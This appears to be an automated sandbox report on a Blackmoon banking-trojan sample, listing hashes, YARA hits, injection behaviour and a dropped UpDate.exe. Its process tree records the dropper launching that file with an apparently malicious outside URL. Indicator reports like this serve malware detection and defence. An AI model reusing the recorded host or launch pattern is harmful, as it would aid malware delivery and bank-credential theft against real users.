blackmoon | 2773345db31260c55aa6133c409961af485b0d7fabcee57261abd9bc7fe23cd2

General

Target

2773345db31260c55aa6133c409961af485b0d7fabcee57261abd9bc7fe23cd2.exe
Size

604KB
MD5

ea13f85983129c01aaba80dfc9f32233
SHA1

0318b55671868e14e4d979ac27ff106f48be9217
SHA256

2773345db31260c55aa6133c409961af485b0d7fabcee57261abd9bc7fe23cd2
SHA512

c68afc560295af176ac2c0aed1e4cf98d9b2c9ef93beb33f62a0c763b3ceeb499ae19f4f6de25da77162f2cecdb00b36945fc31cdad5e2b7a3acedad948276e2
SSDEEP

12288:816zhbcKiFyKBU/eEr3kxoj2x2P7F+Wu:pdbyyKymE7kydP7Y/

Score

10^/10

blackmoon banker trojan upx

Malware Config

Signatures

Blackmoon, KrBanker
Blackmoon also known as KrBanker is banking trojan first discovered in early 2014.
trojan banker blackmoon

Detect Blackmoon payload 8 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2032-68-0x0000000000400000-0x00000000005AF000-memory.dmp	family_blackmoon
\Users\Admin\AppData\Local\Temp\data\UpDate.exe	family_blackmoon
C:\Users\Admin\AppData\Local\Temp\data\UpDate.exe	family_blackmoon
C:\Users\Admin\AppData\Local\Temp\data\UpDate.exe	family_blackmoon
\Users\Admin\AppData\Local\Temp\data\UpDate.exe	family_blackmoon
\Users\Admin\AppData\Local\Temp\data\UpDate.exe	family_blackmoon
\Users\Admin\AppData\Local\Temp\data\UpDate.exe	family_blackmoon
behavioral1/memory/2032-107-0x0000000000400000-0x00000000005AF000-memory.dmp	family_blackmoon

Executes dropped EXE 1 IoCs

Processes:

UpDate.exe

pid process

1704 UpDate.exe

pid	process
1704	UpDate.exe

UPX packed file 24 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/2032-55-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral1/memory/2032-56-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral1/memory/2032-57-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral1/memory/2032-59-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral1/memory/2032-61-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral1/memory/2032-63-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral1/memory/2032-65-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral1/memory/2032-67-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral1/memory/2032-70-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral1/memory/2032-72-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral1/memory/2032-74-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral1/memory/2032-76-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral1/memory/2032-78-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral1/memory/2032-80-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral1/memory/2032-84-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral1/memory/2032-88-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral1/memory/2032-92-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral1/memory/2032-94-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral1/memory/2032-96-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral1/memory/2032-90-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral1/memory/2032-86-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral1/memory/2032-98-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral1/memory/2032-82-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral1/memory/2032-108-0x0000000010000000-0x000000001003E000-memory.dmp	upx

Loads dropped DLL 4 IoCs

Processes:

2773345db31260c55aa6133c409961af485b0d7fabcee57261abd9bc7fe23cd2.exeUpDate.exe

pid process

2032 2773345db31260c55aa6133c409961af485b0d7fabcee57261abd9bc7fe23cd2.exe
1704 UpDate.exe
1704 UpDate.exe
1704 UpDate.exe

Suspicious use of SetWindowsHookEx 5 IoCs

Processes:

2773345db31260c55aa6133c409961af485b0d7fabcee57261abd9bc7fe23cd2.exe

pid	process
2032	2773345db31260c55aa6133c409961af485b0d7fabcee57261abd9bc7fe23cd2.exe
2032	2773345db31260c55aa6133c409961af485b0d7fabcee57261abd9bc7fe23cd2.exe
2032	2773345db31260c55aa6133c409961af485b0d7fabcee57261abd9bc7fe23cd2.exe
2032	2773345db31260c55aa6133c409961af485b0d7fabcee57261abd9bc7fe23cd2.exe
2032	2773345db31260c55aa6133c409961af485b0d7fabcee57261abd9bc7fe23cd2.exe

Suspicious use of WriteProcessMemory 7 IoCs

Processes:

2773345db31260c55aa6133c409961af485b0d7fabcee57261abd9bc7fe23cd2.exe

description	pid	process	target process
PID 2032 wrote to memory of 1704	2032	2773345db31260c55aa6133c409961af485b0d7fabcee57261abd9bc7fe23cd2.exe	UpDate.exe
PID 2032 wrote to memory of 1704	2032	2773345db31260c55aa6133c409961af485b0d7fabcee57261abd9bc7fe23cd2.exe	UpDate.exe
PID 2032 wrote to memory of 1704	2032	2773345db31260c55aa6133c409961af485b0d7fabcee57261abd9bc7fe23cd2.exe	UpDate.exe
PID 2032 wrote to memory of 1704	2032	2773345db31260c55aa6133c409961af485b0d7fabcee57261abd9bc7fe23cd2.exe	UpDate.exe
PID 2032 wrote to memory of 1704	2032	2773345db31260c55aa6133c409961af485b0d7fabcee57261abd9bc7fe23cd2.exe	UpDate.exe
PID 2032 wrote to memory of 1704	2032	2773345db31260c55aa6133c409961af485b0d7fabcee57261abd9bc7fe23cd2.exe	UpDate.exe
PID 2032 wrote to memory of 1704	2032	2773345db31260c55aa6133c409961af485b0d7fabcee57261abd9bc7fe23cd2.exe	UpDate.exe

C:\Users\Admin\AppData\Local\Temp\2773345db31260c55aa6133c409961af485b0d7fabcee57261abd9bc7fe23cd2.exe
"C:\Users\Admin\AppData\Local\Temp\2773345db31260c55aa6133c409961af485b0d7fabcee57261abd9bc7fe23cd2.exe"
1⤵
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2032
- C:\Users\Admin\AppData\Local\Temp\data\UpDate.exe
  C:\Users\Admin\AppData\Local\Temp\data\UpDate.exe 3.0 %43%3A%5C%55%73%65%72%73%5C%41%64%6D%69%6E%5C%41%70%70%44%61%74%61%5C%4C%6F%63%61%6C%5C%54%65%6D%70%5C%32%37%37%33%33%34%35%64%62%33%31%32%36%30%63%35%35%61%61%36%31%33%33%63%34%30%39%39%36%31%61%66%34%38%35%62%30%64%37%66%61%62%63%65%65%35%37%32%36%31%61%62%64%39%62%63%37%66%65%32%33%63%64%32%2E%65%78%65 ¼Ù http://www.gutou.cc/up/shiyimiaozan.txt
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:1704

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\data\UpDate.exe

Filesize
213KB

MD5
22ec9bd8587c55918707d4af545317e1

SHA1
970c756dd66ea3454718b685dd90afd6f9c06993

SHA256
d58c372a42e3ae1e343ad2ed6d3b4c1d510c1d41d909848363b64ebfe3934dbc

SHA512
057795bbe5ef4c5fc6e1b814096b807049eac67f84db98725676d348e284d7efd6d39b923a5db8f2b24314ae964776cade48d4983e78272923e205f6e3b59b3c

Download Submit
C:\Users\Admin\AppData\Local\Temp\data\UpDate.exe

Filesize
213KB

MD5
22ec9bd8587c55918707d4af545317e1

SHA1
970c756dd66ea3454718b685dd90afd6f9c06993

SHA256
d58c372a42e3ae1e343ad2ed6d3b4c1d510c1d41d909848363b64ebfe3934dbc

SHA512
057795bbe5ef4c5fc6e1b814096b807049eac67f84db98725676d348e284d7efd6d39b923a5db8f2b24314ae964776cade48d4983e78272923e205f6e3b59b3c

Download Submit
\Users\Admin\AppData\Local\Temp\data\UpDate.exe

Filesize
213KB

MD5
22ec9bd8587c55918707d4af545317e1

SHA1
970c756dd66ea3454718b685dd90afd6f9c06993

SHA256
d58c372a42e3ae1e343ad2ed6d3b4c1d510c1d41d909848363b64ebfe3934dbc

SHA512
057795bbe5ef4c5fc6e1b814096b807049eac67f84db98725676d348e284d7efd6d39b923a5db8f2b24314ae964776cade48d4983e78272923e205f6e3b59b3c

Download Submit
\Users\Admin\AppData\Local\Temp\data\UpDate.exe

Filesize
213KB

MD5
22ec9bd8587c55918707d4af545317e1

SHA1
970c756dd66ea3454718b685dd90afd6f9c06993

SHA256
d58c372a42e3ae1e343ad2ed6d3b4c1d510c1d41d909848363b64ebfe3934dbc

SHA512
057795bbe5ef4c5fc6e1b814096b807049eac67f84db98725676d348e284d7efd6d39b923a5db8f2b24314ae964776cade48d4983e78272923e205f6e3b59b3c

Download Submit
\Users\Admin\AppData\Local\Temp\data\UpDate.exe

Filesize
213KB

MD5
22ec9bd8587c55918707d4af545317e1

SHA1
970c756dd66ea3454718b685dd90afd6f9c06993

SHA256
d58c372a42e3ae1e343ad2ed6d3b4c1d510c1d41d909848363b64ebfe3934dbc

SHA512
057795bbe5ef4c5fc6e1b814096b807049eac67f84db98725676d348e284d7efd6d39b923a5db8f2b24314ae964776cade48d4983e78272923e205f6e3b59b3c

Download Submit
\Users\Admin\AppData\Local\Temp\data\UpDate.exe

Filesize
213KB

MD5
22ec9bd8587c55918707d4af545317e1

SHA1
970c756dd66ea3454718b685dd90afd6f9c06993

SHA256
d58c372a42e3ae1e343ad2ed6d3b4c1d510c1d41d909848363b64ebfe3934dbc

SHA512
057795bbe5ef4c5fc6e1b814096b807049eac67f84db98725676d348e284d7efd6d39b923a5db8f2b24314ae964776cade48d4983e78272923e205f6e3b59b3c

Download Submit
memory/1704-100-0x0000000000000000-mapping.dmp

Download
memory/2032-84-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2032-96-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2032-68-0x0000000000400000-0x00000000005AF000-memory.dmp

Filesize
1.7MB

Download
memory/2032-70-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2032-72-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2032-74-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2032-76-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2032-78-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2032-80-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2032-54-0x0000000075DF1000-0x0000000075DF3000-memory.dmp

Filesize
8KB

Download
memory/2032-88-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2032-92-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2032-94-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2032-67-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2032-90-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2032-86-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2032-98-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2032-82-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2032-65-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2032-63-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2032-61-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2032-59-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2032-57-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2032-56-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2032-55-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2032-107-0x0000000000400000-0x00000000005AF000-memory.dmp

Filesize
1.7MB

Download
memory/2032-108-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads